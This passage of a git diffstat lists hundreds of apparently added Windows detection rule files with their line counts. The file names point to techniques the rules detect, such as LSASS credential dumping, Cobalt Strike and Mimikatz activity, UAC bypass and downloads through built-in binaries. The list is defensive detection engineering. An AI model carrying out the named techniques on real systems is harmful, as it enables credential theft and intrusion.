...age_load_side_load_chrome_frame_helper.yml | 36 + ...image_load_side_load_classicexplorer32.yml | 32 + .../image_load_side_load_comctl32.yml | 37 + .../image_load_side_load_coregen.yml | 33 + ...side_load_cpl_from_non_system_location.yml | 34 + .../image_load_side_load_dbgcore_dll.yml | 41 + .../image_load_side_load_dbghelp_dll.yml | 47 + .../image_load_side_load_eacore.yml | 33 + .../image_load_side_load_edputil.yml | 33 + ...oad_side_load_from_non_system_location.yml | 487 ++ .../image_load_side_load_goopdate.yml | 42 + .../image_load_side_load_gup_libcurl.yml | 32 + .../image_load_side_load_iviewers.yml | 32 + .../image_load_side_load_jsschhlp.yml | 32 + .../image_load_side_load_libvlc.yml | 34 + .../image_load_side_load_mfdetours.yml | 30 + ...mage_load_side_load_mfdetours_unsigned.yml | 34 + ...image_load_side_load_non_existent_dlls.yml | 54 + .../image_load_side_load_office_dlls.yml | 36 + .../image_load/image_load_side_load_rcdll.yml | 33 + ...side_load_rjvplatform_default_location.yml | 29 + ..._load_rjvplatform_non_default_location.yml | 31 + .../image_load_side_load_robform.yml | 39 + .../image_load_side_load_shell_chrome_api.yml | 36 + .../image_load_side_load_shelldispatch.yml | 33 + .../image_load_side_load_smadhook.yml | 40 + .../image_load_side_load_solidpdfcreator.yml | 33 + .../image_load_side_load_third_party.yml | 48 + .../image_load_side_load_ualapi.yml | 32 + .../image_load_side_load_vivaldi_elf.yml | 31 + .../image_load_side_load_vmguestlib.yml | 34 + ...ge_load_side_load_vmmap_dbghelp_signed.yml | 36 + ..._load_side_load_vmmap_dbghelp_unsigned.yml | 38 + .../image_load_side_load_vmware_xfer.yml | 30 + .../image_load_side_load_waveedit.yml | 35 + .../image_load/image_load_side_load_wazuh.yml | 43 + .../image_load_side_load_windows_defender.yml | 40 + .../image_load/image_load_side_load_wwlib.yml | 38 + .../image_load_spoolsv_dll_load.yml | 36 + ..._susp_clickonce_unsigned_module_loaded.yml | 29 + ...mage_load_susp_dll_load_system_process.yml | 31 + .../image_load_susp_python_image_load.yml | 37 + ...e_load_susp_script_dotnet_clr_dll_load.yml | 43 + .../image_load_susp_uncommon_image_load.yml | 30 + .../image_load_thor_unsigned_execution.yml | 35 + .../image_load_uac_bypass_iscsicpl.yml | 34 + .../image_load_uac_bypass_via_dism.yml | 33 + ...persistence_commandline_event_consumer.yml | 28 + ...ge_load_wmic_remote_xsl_scripting_dlls.yml | 34 + ...mage_load_wmiprvse_wbemcomn_dll_hijack.yml | 30 + .../image_load_wsman_provider_image_load.yml | 74 + .../net_connection_win_addinutil.yml | 27 + .../net_connection_win_binary_susp_com.yml | 67 + ...tion_win_certutil_initiated_connection.yml | 35 + ...net_connection_win_crypto_mining_pools.yml | 256 + ...net_connection_win_dead_drop_resolvers.yml | 212 + ...et_connection_win_devtunnel_connection.yml | 37 + ...et_connection_win_dfsvc_uncommon_ports.yml | 32 + ...connection_win_dllhost_net_connections.yml | 78 + .../net_connection_win_eqnedt.yml | 27 + ..._win_excel_outbound_network_connection.yml | 54 + ...tion_win_google_api_non_browser_access.yml | 83 + .../net_connection_win_hh.yml | 36 + .../net_connection_win_imewdbld.yml | 33 + .../net_connection_win_mega_nz.yml | 29 + .../net_connection_win_msiexec.yml | 30 + .../net_connection_win_ngrok_domains.yml | 36 + .../net_connection_win_ngrok_tunnel.yml | 40 + ...nection_win_notepad_network_connection.yml | 32 + ...tion_win_notion_api_susp_communication.yml | 68 + .../net_connection_win_office_susp_ports.yml | 43 + ...tion_win_powershell_network_connection.yml | 81 + .../net_connection_win_python.yml | 45 + ...n_rdp_outbound_over_non_standard_tools.yml | 78 + .../net_connection_win_rdp_reverse_tunnel.yml | 35 + .../net_connection_win_rdp_to_http.yml | 36 + ...tion_win_reddit_api_non_browser_access.yml | 70 + ...nnection_win_regsvr32_network_activity.yml | 31 + ..._win_remote_powershell_session_network.yml | 53 + ...onnection_win_rundll32_net_connections.yml | 59 + .../net_connection_win_script.yml | 29 + .../net_connection_win_script_wan.yml | 50 + ..._silenttrinity_stager_msbuild_activity.yml | 32 + ..._connection_win_susp_binary_no_cmdline.yml | 37 + .../net_connection_win_susp_cmstp.yml | 27 + .../net_connection_win_susp_dropbox_api.yml | 32 + .../net_connection_win_susp_epmap.yml | 39 + ...connection_win_susp_external_ip_lookup.yml | 106 + ...nection_win_susp_malware_callback_port.yml | 110 + ...n_susp_malware_callback_ports_uncommon.yml | 59 + ..._win_susp_outbound_kerberos_connection.yml | 42 + ...n_win_susp_outbound_mobsync_connection.yml | 50 + ...ion_win_susp_outbound_smtp_connections.yml | 44 + ..._susp_prog_location_network_connection.yml | 38 + ...on_win_telegram_api_non_browser_access.yml | 67 + ...onnection_win_vscode_tunnel_connection.yml | 37 + ...onnection_win_winlogon_net_connections.yml | 50 + ...nection_win_wuauclt_network_connection.yml | 92 + ...dfs_namedpipe_connection_uncommon_tool.yml | 48 + .../pipe_created_hktl_cobaltstrike.yml | 62 + .../pipe_created_hktl_cobaltstrike_re.yml | 55 + ...d_hktl_cobaltstrike_susp_pipe_patterns.yml | 73 + .../pipe_created_hktl_coercedpotato.yml | 31 + .../pipe_created_hktl_diagtrack_eop.yml | 29 + .../pipe_created_hktl_efspotato.yml | 38 + ...ted_hktl_generic_cred_dump_tools_pipes.yml | 37 + .../pipe_created_hktl_koh_default_pipe.yml | 34 + ...created_powershell_alternate_host_pipe.yml | 59 + ...pipe_created_powershell_execution_pipe.yml | 34 + .../pipe_created_pua_csexec_default_pipe.yml | 36 + .../pipe_created_pua_paexec_default_pipe.yml | 30 + .../pipe_created_pua_remcom_default_pipe.yml | 36 + ...created_scrcons_wmi_consumer_namedpipe.yml | 30 + ...pipe_created_susp_malicious_namedpipes.yml | 70 + ...nals_psexec_default_pipe_susp_location.yml | 41 + ...on_win_userdomain_variable_enumeration.yml | 29 + ...c_access_win_cmstp_execution_by_access.yml | 33 + ...ktl_cobaltstrike_bof_injection_pattern.yml | 33 + .../proc_access_win_hktl_generic_access.yml | 115 + ...ccess_win_hktl_handlekatz_lsass_access.yml | 34 + ...n_hktl_littlecorporal_generated_maldoc.yml | 31 + .../proc_access_win_hktl_sysmonente.yml | 43 + ...proc_access_win_lsass_dump_comsvcs_dll.yml | 30 + ...oc_access_win_lsass_dump_keyword_image.yml | 57 + .../proc_access_win_lsass_memdump.yml | 62 + ...roc_access_win_lsass_python_based_tool.yml | 42 + ...s_win_lsass_remote_access_trough_winrm.yml | 35 + .../proc_access_win_lsass_seclogon_access.yml | 31 + ...proc_access_win_lsass_susp_access_flag.yml | 130 + .../proc_access_win_lsass_werfault.yml | 31 + ...ss_win_lsass_whitelisted_process_names.yml | 62 + ...ess_win_susp_direct_ntopenprocess_call.yml | 78 + ...roc_access_win_susp_invoke_patchingapi.yml | 77 + ...oc_access_win_susp_shellcode_injection.yml | 72 + ..._access_win_svchost_credential_dumping.yml | 31 + ...access_win_svchost_susp_access_request.yml | 37 + ...in_uac_bypass_editionupgrademanagerobj.yml | 29 + ...roc_access_win_uac_bypass_wow64_logger.yml | 30 + ...proc_creation_win_7zip_exfil_dmp_files.yml | 43 + ...creation_win_7zip_password_compression.yml | 40 + ..._creation_win_7zip_password_extraction.yml | 38 + ...ation_win_addinutil_suspicious_cmdline.yml | 51 + ...n_win_addinutil_uncommon_child_process.yml | 32 + ...reation_win_addinutil_uncommon_cmdline.yml | 38 + ...eation_win_addinutil_uncommon_dir_exec.yml | 32 + .../proc_creation_win_adplus_memory_dump.yml | 43 + ...tion_win_agentexecutor_potential_abuse.yml | 45 + ..._creation_win_agentexecutor_susp_usage.yml | 49 + ...tion_win_appvlp_uncommon_child_process.yml | 48 + ...creation_win_aspnet_compiler_exectuion.yml | 38 + ...win_aspnet_compiler_susp_child_process.yml | 47 + ...reation_win_aspnet_compiler_susp_paths.yml | 46 + ..._creation_win_at_interactive_execution.yml | 29 + .../proc_creation_win_attrib_hiding_files.yml | 38 + .../proc_creation_win_attrib_system.yml | 35 + ..._creation_win_attrib_system_susp_paths.yml | 57 + ...ion_win_auditpol_nt_resource_kit_usage.yml | 39 + ...c_creation_win_auditpol_susp_execution.yml | 39 + ...oc_creation_win_bash_command_execution.yml | 32 + .../proc_creation_win_bash_file_execution.yml | 47 + ..._creation_win_bcdedit_boot_conf_tamper.yml | 42 + ...oc_creation_win_bcdedit_susp_execution.yml | 36 + ...on_win_bginfo_suspicious_child_process.yml | 52 + ...tion_win_bginfo_uncommon_child_process.yml | 36 + .../proc_creation_win_bitsadmin_download.yml | 44 + ...ation_win_bitsadmin_download_direct_ip.yml | 58 + ...itsadmin_download_file_sharing_domains.yml | 69 + ...win_bitsadmin_download_susp_extensions.yml | 72 + ...n_bitsadmin_download_susp_targetfolder.yml | 51 + ...tsadmin_download_uncommon_targetfolder.yml | 49 + ...on_win_bitsadmin_potential_persistence.yml | 44 + ...n_browsers_chromium_headless_debugging.yml | 35 + ...on_win_browsers_chromium_headless_exec.yml | 36 + ...owsers_chromium_headless_file_download.yml | 40 + ...n_win_browsers_chromium_load_extension.yml | 38 + ...on_win_browsers_chromium_mockbin_abuse.yml | 36 + ..._browsers_chromium_susp_load_extension.yml | 47 + ...tion_win_browsers_inline_file_download.yml | 48 + ...creation_win_browsers_remote_debugging.yml | 37 + ...oc_creation_win_browsers_tor_execution.yml | 29 + .../proc_creation_win_calc_uncommon_exec.yml | 35 + ...n_win_certmgr_certificate_installation.yml | 40 + .../proc_creation_win_certoc_download.yml | 35 + ...creation_win_certoc_download_direct_ip.yml | 35 + .../proc_creation_win_certoc_load_dll.yml | 40 + ...ion_win_certoc_load_dll_susp_locations.yml | 44 + ..._win_certutil_certificate_installation.yml | 41 + .../proc_creation_win_certutil_decode.yml | 40 + .../proc_creation_win_certutil_download.yml | 40 + ...eation_win_certutil_download_direct_ip.yml | 77 + ...certutil_download_file_sharing_domains.yml | 67 + .../proc_creation_win_certutil_encode.yml | 34 + ...on_win_certutil_encode_susp_extensions.yml | 52 + ...tion_win_certutil_encode_susp_location.yml | 47 + .../proc_creation_win_certutil_export_pfx.yml | 32 + ...oc_creation_win_certutil_ntlm_coercion.yml | 32 + ...proc_creation_win_chcp_codepage_lookup.yml | 38 + ...proc_creation_win_chcp_codepage_switch.yml | 37 + ...tion_win_cipher_overwrite_deleted_data.yml | 33 + ...ion_win_citrix_trolleyexpress_procdump.yml | 48 + .../proc_creation_win_clip_execution.yml | 29 + ...ion_win_cloudflared_portable_execution.yml | 35 + ..._win_cloudflared_quicktunnel_execution.yml | 93 + ...reation_win_cloudflared_tunnel_cleanup.yml | 35 + ...oc_creation_win_cloudflared_tunnel_run.yml | 38 + .../proc_creation_win_cmd_assoc_execution.yml | 43 + ..._cmd_assoc_tamper_exe_file_association.yml | 39 + ...c_creation_win_cmd_copy_dmp_from_share.yml | 36 + ...ation_win_cmd_curl_download_exec_combo.yml | 37 + .../proc_creation_win_cmd_del_execution.yml | 42 + ...c_creation_win_cmd_del_greedy_deletion.yml | 41 + .../proc_creation_win_cmd_dir_execution.yml | 30 + .../proc_creation_win_cmd_dosfuscation.yml | 46 + .../proc_creation_win_cmd_http_appdata.yml | 38 + .../proc_creation_win_cmd_mklink_osk_cmd.yml | 35 + ...md_mklink_shadow_copies_access_symlink.yml | 30 + ...reation_win_cmd_net_use_and_exec_combo.yml | 41 + ...oc_creation_win_cmd_no_space_execution.yml | 71 + ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 30 + .../proc_creation_win_cmd_path_traversal.yml | 44 + ...n_win_cmd_ping_copy_combined_execution.yml | 36 + ...on_win_cmd_ping_del_combined_execution.yml | 46 + .../proc_creation_win_cmd_redirect.yml | 38 + ...eation_win_cmd_redirection_susp_folder.yml | 61 + .../proc_creation_win_cmd_rmdir_execution.yml | 39 + ...roc_creation_win_cmd_shadowcopy_access.yml | 33 + .../proc_creation_win_cmd_stdin_redirect.yml | 33 + ...cmd_sticky_key_like_backdoor_execution.yml | 50 + ...c_creation_win_cmd_sticky_keys_replace.yml | 34 + .../proc_creation_win_cmd_unusual_parent.yml | 52 + ...eation_win_cmdkey_adding_generic_creds.yml | 32 + .../proc_creation_win_cmdkey_recon.yml | 38 + ...eation_win_cmstp_execution_by_creation.yml | 35 + ...roc_creation_win_conhost_legacy_option.yml | 32 + ...oc_creation_win_conhost_path_traversal.yml | 27 + ...reation_win_conhost_susp_child_process.yml | 35 + ...c_creation_win_conhost_uncommon_parent.yml | 59 + .../proc_creation_win_control_panel_item.yml | 47 + ...eation_win_createdump_lolbin_execution.yml | 40 + ...ation_win_csc_susp_dynamic_compilation.yml | 76 + .../proc_creation_win_csc_susp_parent.yml | 91 + .../proc_creation_win_csi_execution.yml | 44 + ...creation_win_csi_use_of_csharp_console.yml | 32 + .../proc_creation_win_csvde_export.yml | 32 + ...roc_creation_win_curl_cookie_hijacking.yml | 29 + ...oc_creation_win_curl_custom_user_agent.yml | 30 + ...ation_win_curl_download_direct_ip_exec.yml | 85 + ...url_download_direct_ip_susp_extensions.yml | 82 + ...url_download_susp_file_sharing_domains.yml | 93 + ..._creation_win_curl_insecure_connection.yml | 29 + ...reation_win_curl_insecure_porxy_or_doh.yml | 30 + ...proc_creation_win_curl_local_file_read.yml | 28 + .../proc_creation_win_curl_susp_download.yml | 71 + ...desktopimgdownldr_remote_file_download.yml | 28 + ...n_win_desktopimgdownldr_susp_execution.yml | 40 + ...ion_win_deviceenroller_dll_sideloading.yml | 36 + ...proc_creation_win_devinit_lolbin_usage.yml | 31 + ...n_win_dfsvc_suspicious_child_processes.yml | 45 + .../proc_creation_win_dirlister_execution.yml | 29 + ...tion_win_diskshadow_child_process_susp.yml | 51 + ...on_win_diskshadow_script_mode_susp_ext.yml | 52 + ...n_diskshadow_script_mode_susp_location.yml | 55 + ..._creation_win_dll_sideload_vmware_xfer.yml | 28 + ..._creation_win_dllhost_no_cli_execution.yml | 34 + ...n_win_dns_exfiltration_tools_execution.yml | 29 + ...oc_creation_win_dns_susp_child_process.yml | 29 + .../proc_creation_win_dnscmd_discovery.yml | 36 + ...md_install_new_server_level_plugin_dll.yml | 37 + ...tion_win_dotnet_trace_lolbin_execution.yml | 32 + .../proc_creation_win_driverquery_recon.yml | 43 + .../proc_creation_win_driverquery_usage.yml | 43 + ..._creation_win_dsacls_abuse_permissions.yml | 39 + ...roc_creation_win_dsacls_password_spray.yml | 34 + .../proc_creation_win_dsim_remove.yml | 44 + ...ion_win_dsquery_domain_trust_discovery.yml | 36 + .../proc_creation_win_dtrace_kernel_dump.yml | 32 + ...oc_creation_win_dumpminitool_execution.yml | 43 + ...eation_win_dumpminitool_susp_execution.yml | 50 + .../proc_creation_win_esentutl_params.yml | 37 + ...ation_win_esentutl_sensitive_file_copy.yml | 50 + .../proc_creation_win_esentutl_webcache.yml | 36 + ...eation_win_eventvwr_susp_child_process.yml | 38 + ...ltration_and_tunneling_tools_execution.yml | 32 + ...proc_creation_win_expand_cabinet_files.yml | 54 + ...eation_win_explorer_break_process_tree.yml | 38 + ...creation_win_explorer_lolbin_execution.yml | 29 + .../proc_creation_win_explorer_nouaccheck.yml | 32 + .../proc_creation_win_findstr_download.yml | 48 + ...roc_creation_win_findstr_gpp_passwords.yml | 37 + .../proc_creation_win_findstr_lnk.yml | 39 + .../proc_creation_win_findstr_lsass.yml | 42 + ...oc_creation_win_findstr_recon_everyone.yml | 47 + ...creation_win_findstr_recon_pipe_output.yml | 74 + ...on_win_findstr_security_keyword_lookup.yml | 68 + ..._creation_win_findstr_subfolder_search.yml | 46 + ..._sysmon_discovery_via_default_altitude.yml | 34 + .../proc_creation_win_finger_usage.yml | 30 + .../proc_creation_win_fltmc_unload_driver.yml | 39 + ...reation_win_fltmc_unload_driver_sysmon.yml | 37 + ...in_forfiles_child_process_masquerading.yml | 44 + ...creation_win_forfiles_proxy_execution_.yml | 41 + ..._creation_win_fsutil_drive_enumeration.yml | 31 + ..._creation_win_fsutil_symlinkevaluation.yml | 36 + .../proc_creation_win_fsutil_usage.yml | 42 + ...ownloadwrapper_arbitrary_file_download.yml | 32 + .../proc_creation_win_git_susp_clone.yml | 51 + ...on_win_googleupdate_susp_child_process.yml | 38 + .../proc_creation_win_gpg4win_decryption.yml | 34 + .../proc_creation_win_gpg4win_encryption.yml | 34 + ...reation_win_gpg4win_portable_execution.yml | 37 + ...roc_creation_win_gpg4win_susp_location.yml | 41 + .../proc_creation_win_gpresult_execution.yml | 32 + ...ion_win_gup_arbitrary_binary_execution.yml | 34 + .../proc_creation_win_gup_download.yml | 34 + ..._creation_win_gup_suspicious_execution.yml | 36 + .../proc_creation_win_hh_chm_execution.yml | 32 + ...in_hh_chm_remote_download_or_execution.yml | 32 + ...on_win_hh_html_help_susp_child_process.yml | 58 + .../proc_creation_win_hh_susp_execution.yml | 56 + .../proc_creation_win_hktl_adcspwn.yml | 29 + ...reation_win_hktl_bloodhound_sharphound.yml | 58 + ..._creation_win_hktl_c3_rundll32_pattern.yml | 30 + .../proc_creation_win_hktl_certify.yml | 45 + .../proc_creation_win_hktl_certipy.yml | 51 + ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 49 + ...win_hktl_cobaltstrike_bloopers_modules.yml | 42 + ...win_hktl_cobaltstrike_load_by_rundll32.yml | 38 + ...win_hktl_cobaltstrike_process_patterns.yml | 44 + .../proc_creation_win_hktl_coercedpotato.yml | 39 + .../proc_creation_win_hktl_covenant.yml | 40 + ...eation_win_hktl_crackmapexec_execution.yml | 86 + ...n_hktl_crackmapexec_execution_patterns.yml | 41 + ...reation_win_hktl_crackmapexec_patterns.yml | 49 + ...tl_crackmapexec_powershell_obfuscation.yml | 48 + .../proc_creation_win_hktl_createminidump.yml | 29 + .../proc_creation_win_hktl_dinjector.yml | 29 + .../proc_creation_win_hktl_dumpert.yml | 29 + .../proc_creation_win_hktl_edrsilencer.yml | 29 + ...tion_win_hktl_empire_powershell_launch.yml | 36 + ..._win_hktl_empire_powershell_uac_bypass.yml | 35 + .../proc_creation_win_hktl_evil_winrm.yml | 32 + ...ation_win_hktl_execution_via_imphashes.yml | 203 + ...ion_win_hktl_execution_via_pe_metadata.yml | 29 + .../proc_creation_win_hktl_gmer.yml | 35 + .../proc_creation_win_hktl_handlekatz.yml | 44 + .../proc_creation_win_hktl_hashcat.yml | 33 + ...c_creation_win_hktl_htran_or_natbypass.yml | 35 + .../proc_creation_win_hktl_hydra.yml | 33 + ...ion_win_hktl_impacket_lateral_movement.yml | 76 + .../proc_creation_win_hktl_impacket_tools.yml | 78 + .../proc_creation_win_hktl_impersonate.yml | 44 + .../proc_creation_win_hktl_inveigh.yml | 38 + ...ation_win_hktl_invoke_obfuscation_clip.yml | 39 + ...obfuscation_obfuscated_iex_commandline.yml | 35 + ...tion_win_hktl_invoke_obfuscation_stdin.yml | 42 + ...eation_win_hktl_invoke_obfuscation_var.yml | 38 + ...n_hktl_invoke_obfuscation_via_compress.yml | 35 + ..._win_hktl_invoke_obfuscation_via_stdin.yml | 36 + ...n_hktl_invoke_obfuscation_via_use_clip.yml | 44 + ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 35 + ...on_win_hktl_invoke_obfuscation_via_var.yml | 43 + ...eation_win_hktl_jlaive_batch_execution.yml | 45 + .../proc_creation_win_hktl_koadic.yml | 40 + .../proc_creation_win_hktl_krbrelay.yml | 43 + .../proc_creation_win_hktl_krbrelayup.yml | 45 + .../proc_creation_win_hktl_localpotato.yml | 40 + ...reation_win_hktl_meterpreter_getsystem.yml | 54 + ...reation_win_hktl_mimikatz_command_line.yml | 59 + .../proc_creation_win_hktl_pchunter.yml | 62 + ...tl_powersploit_empire_default_schtasks.yml | 47 + .../proc_creation_win_hktl_powertool.yml | 33 + ...eation_win_hktl_purplesharp_indicators.yml | 32 + .../proc_creation_win_hktl_pypykatz.yml | 33 + .../proc_creation_win_hktl_quarks_pwdump.yml | 38 + ...on_win_hktl_redmimicry_winnti_playbook.yml | 36 + ..._creation_win_hktl_relay_attacks_tools.yml | 62 + .../proc_creation_win_hktl_rubeus.yml | 53 + .../proc_creation_win_hktl_safetykatz.yml | 29 + .../proc_creation_win_hktl_secutyxploded.yml | 30 + .../proc_creation_win_hktl_selectmyparent.yml | 58 + .../proc_creation_win_hktl_sharp_chisel.yml | 33 + ..._creation_win_hktl_sharp_impersonation.yml | 44 + ...c_creation_win_hktl_sharp_ldap_monitor.yml | 32 + .../proc_creation_win_hktl_sharpersist.yml | 45 + .../proc_creation_win_hktl_sharpevtmute.yml | 34 + ...proc_creation_win_hktl_sharpldapwhoami.yml | 39 + .../proc_creation_win_hktl_sharpup.yml | 38 + .../proc_creation_win_hktl_sharpview.yml | 146 + ...creation_win_hktl_silenttrinity_stager.yml | 30 + ...n_win_hktl_sliver_c2_execution_pattern.yml | 28 + ...ation_win_hktl_stracciatella_execution.yml | 37 + .../proc_creation_win_hktl_sysmoneop.yml | 35 + .../proc_creation_win_hktl_trufflesnout.yml | 30 + .../proc_creation_win_hktl_uacme.yml | 70 + .../proc_creation_win_hktl_wce.yml | 38 + .../proc_creation_win_hktl_winpeas.yml | 52 + .../proc_creation_win_hktl_winpwn.yml | 49 + ...on_win_hktl_wmiexec_default_powershell.yml | 26 + .../proc_creation_win_hktl_xordump.yml | 33 + .../proc_creation_win_hktl_zipexec.yml | 39 + .../proc_creation_win_hostname_execution.yml | 27 + .../proc_creation_win_hwp_exploits.yml | 36 + .../proc_creation_win_hxtsr_masquerading.yml | 32 + .../proc_creation_win_icacls_deny.yml | 32 + .../proc_creation_win_ieexec_download.yml | 32 + ...c_creation_win_iis_appcmd_http_logging.yml | 34 + ...appcmd_service_account_password_dumped.yml | 52 + ...ion_win_iis_appcmd_susp_module_install.yml | 38 + ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 33 + ..._win_iis_connection_strings_decryption.yml | 32 + ...ation_win_iis_susp_module_registration.yml | 36 + ...ion_win_imagingdevices_unusual_parents.yml | 35 + .../proc_creation_win_imewbdld_download.yml | 37 + ..._infdefaultinstall_execute_sct_scripts.yml | 35 + ...proc_creation_win_installutil_download.yml | 34 + ...eation_win_instalutil_no_log_execution.yml | 31 + ...on_win_java_keytool_susp_child_process.yml | 54 + ...n_java_manageengine_susp_child_process.yml | 65 + ...roc_creation_win_java_remote_debugging.yml | 38 + ...c_creation_win_java_susp_child_process.yml | 55 + ...creation_win_java_susp_child_process_2.yml | 37 + ...n_java_sysaidserver_susp_child_process.yml | 29 + .../proc_creation_win_kd_execution.yml | 27 + ...on_win_ksetup_password_change_computer.yml | 29 + ...eation_win_ksetup_password_change_user.yml | 28 + .../proc_creation_win_ldifde_export.yml | 32 + .../proc_creation_win_ldifde_file_load.yml | 37 + ...n_lodctr_performance_counter_tampering.yml | 30 + ...c_creation_win_logman_disable_eventlog.yml | 41 + .../proc_creation_win_lolbin_cdb.yml | 37 + ...creation_win_lolbin_class_exec_xwizard.yml | 28 + .../proc_creation_win_lolbin_cmdl32.yml | 35 + ...eation_win_lolbin_configsecuritypolicy.yml | 34 + ...oc_creation_win_lolbin_customshellhost.yml | 29 + ...data_exfiltration_by_using_datasvcutil.yml | 44 + ...eation_win_lolbin_dctask64_proc_inject.yml | 35 + .../proc_creation_win_lolbin_defaultpack.yml | 28 + ...in_lolbin_device_credential_deployment.yml | 26 + ...c_creation_win_lolbin_devtoolslauncher.yml | 29 + .../proc_creation_win_lolbin_diantz_ads.yml | 30 + ..._creation_win_lolbin_diantz_remote_cab.yml | 30 + ...eation_win_lolbin_dll_sideload_xwizard.yml | 30 + .../proc_creation_win_lolbin_dnx.yml | 29 + .../proc_creation_win_lolbin_dotnet.yml | 39 + .../proc_creation_win_lolbin_dotnet_dump.yml | 30 + .../proc_creation_win_lolbin_dump64.yml | 33 + .../proc_creation_win_lolbin_extexport.yml | 29 + .../proc_creation_win_lolbin_extrac32.yml | 36 + .../proc_creation_win_lolbin_extrac32_ads.yml | 30 + .../proc_creation_win_lolbin_format.yml | 34 + ...reation_win_lolbin_fsharp_interpreters.yml | 32 + .../proc_creation_win_lolbin_ftp.yml | 36 + ...reation_win_lolbin_gather_network_info.yml | 42 + .../proc_creation_win_lolbin_gpscript.yml | 35 + .../proc_creation_win_lolbin_ie4uinit.yml | 35 + .../proc_creation_win_lolbin_ilasm.yml | 29 + .../proc_creation_win_lolbin_jsc.yml | 27 + .../proc_creation_win_lolbin_kavremover.yml | 30 + ..._creation_win_lolbin_launch_vsdevshell.yml | 30 + .../proc_creation_win_lolbin_manage_bde.yml | 41 + ...win_lolbin_mavinject_process_injection.yml | 41 + .../proc_creation_win_lolbin_mpiexec.yml | 35 + .../proc_creation_win_lolbin_msdeploy.yml | 38 + ...c_creation_win_lolbin_msdt_answer_file.yml | 34 + .../proc_creation_win_lolbin_openconsole.yml | 29 + .../proc_creation_win_lolbin_openwith.yml | 29 + .../proc_creation_win_lolbin_pcalua.yml | 32 + .../proc_creation_win_lolbin_pcwrun.yml | 35 + ...roc_creation_win_lolbin_pcwrun_follina.yml | 28 + .../proc_creation_win_lolbin_pcwutl.yml | 33 + .../proc_creation_win_lolbin_pester.yml | 39 + .../proc_creation_win_lolbin_pester_1.yml | 44 + .../proc_creation_win_lolbin_printbrm.yml | 31 + .../proc_creation_win_lolbin_pubprn.yml | 28 + ...tion_win_lolbin_rasautou_dll_execution.yml | 34 + .../proc_creation_win_lolbin_register_app.yml | 28 + .../proc_creation_win_lolbin_remote.yml | 28 + .../proc_creation_win_lolbin_replace.yml | 32 + .../proc_creation_win_lolbin_runexehelper.yml | 27 + ...oc_creation_win_lolbin_runscripthelper.yml | 32 + .../proc_creation_win_lolbin_scriptrunner.yml | 30 + .../proc_creation_win_lolbin_setres.yml | 31 + ...oc_creation_win_lolbin_settingsynchost.yml | 38 + .../proc_creation_win_lolbin_sftp.yml | 33 + ...eation_win_lolbin_sideload_link_binary.yml | 33 + .../proc_creation_win_lolbin_sigverif.yml | 27 + .../proc_creation_win_lolbin_ssh.yml | 39 + ...eation_win_lolbin_susp_acccheckconsole.yml | 32 + ...proc_creation_win_lolbin_susp_atbroker.yml | 58 + ...ation_win_lolbin_susp_certreq_download.yml | 37 + ...olbin_susp_driver_installed_by_pnputil.yml | 41 + .../proc_creation_win_lolbin_susp_dxcap.yml | 31 + .../proc_creation_win_lolbin_susp_grpconv.yml | 28 + ...ion_win_lolbin_susp_sqldumper_activity.yml | 32 + ...n_syncappvpublishingserver_execute_psh.yml | 39 + ...ncappvpublishingserver_vbs_execute_psh.yml | 36 + .../proc_creation_win_lolbin_tracker.yml | 42 + .../proc_creation_win_lolbin_ttdinject.yml | 27 + ..._creation_win_lolbin_tttracer_mod_load.yml | 34 + .../proc_creation_win_lolbin_type.yml | 33 + .../proc_creation_win_lolbin_unregmp2.yml | 29 + ...c_creation_win_lolbin_utilityfunctions.yml | 28 + ...ation_win_lolbin_visual_basic_compiler.yml | 28 + ...ation_win_lolbin_visualuiaverifynative.yml | 30 + ...c_creation_win_lolbin_vsiisexelauncher.yml | 31 + .../proc_creation_win_lolbin_wfc.yml | 28 + .../proc_creation_win_lolbin_wlrmdr.yml | 43 + ..._creation_win_lolbin_workflow_compiler.yml | 35 + ...oc_creation_win_lolscript_register_app.yml | 35 + .../proc_creation_win_lsass_process_clone.yml | 31 + ..._creation_win_malware_conti_shadowcopy.yml | 37 + ...oc_creation_win_malware_script_dropper.yml | 44 + ...roc_creation_win_mftrace_child_process.yml | 27 + ...reation_win_mmc_mmc20_lateral_movement.yml | 30 + ...oc_creation_win_mmc_susp_child_process.yml | 41 + .../proc_creation_win_mofcomp_execution.yml | 56 + ...ion_win_mpcmdrun_dll_sideload_defender.yml | 39 + ...n_win_mpcmdrun_download_arbitrary_file.yml | 37 + ...run_remove_windows_defender_definition.yml | 38 + ...eation_win_msbuild_susp_parent_process.yml | 35 + ...n_win_msdt_arbitrary_command_execution.yml | 38 + ...roc_creation_win_msdt_susp_cab_options.yml | 38 + .../proc_creation_win_msdt_susp_parent.yml | 44 + ...roc_creation_win_msedge_proxy_download.yml | 32 + .../proc_creation_win_mshta_http.yml | 34 + ...roc_creation_win_mshta_inline_vbscript.yml | 31 + .../proc_creation_win_mshta_javascript.yml | 31 + ...creation_win_mshta_lethalhta_technique.yml | 28 + ...reation_win_mshta_susp_child_processes.yml | 53 + ...proc_creation_win_mshta_susp_execution.yml | 46 + .../proc_creation_win_mshta_susp_pattern.yml | 59 + .../proc_creation_win_msiexec_dll.yml | 36 + .../proc_creation_win_msiexec_embedding.yml | 41 + .../proc_creation_win_msiexec_execute_dll.yml | 48 + ...roc_creation_win_msiexec_install_quiet.yml | 57 + ...oc_creation_win_msiexec_install_remote.yml | 50 + ...proc_creation_win_msiexec_masquerading.yml | 33 + .../proc_creation_win_msiexec_web_install.yml | 34 + .../proc_creation_win_msohtmed_download.yml | 34 + .../proc_creation_win_mspub_download.yml | 34 + ...oc_creation_win_msra_process_injection.yml | 38 + ...reation_win_mssql_sqlps_susp_execution.yml | 38 + ...on_win_mssql_sqltoolsps_susp_execution.yml | 36 + ..._creation_win_mssql_susp_child_process.yml | 50 + ...n_win_mssql_veaam_susp_child_processes.yml | 57 + ...reation_win_mstsc_rdp_hijack_shadowing.yml | 30 + ...c_creation_win_mstsc_remote_connection.yml | 37 + ..._creation_win_mstsc_run_local_rdp_file.yml | 36 + ...mstsc_run_local_rdp_file_susp_location.yml | 44 + ...n_mstsc_run_local_rpd_file_susp_parent.yml | 44 + .../proc_creation_win_msxsl_execution.yml | 31 + ...oc_creation_win_msxsl_remote_execution.yml | 28 + ..._win_net_default_accounts_manipulation.yml | 73 + ...tion_win_net_groups_and_accounts_recon.yml | 66 + ..._win_net_network_connections_discovery.yml | 39 + ...eation_win_net_share_and_sessions_enum.yml | 41 + 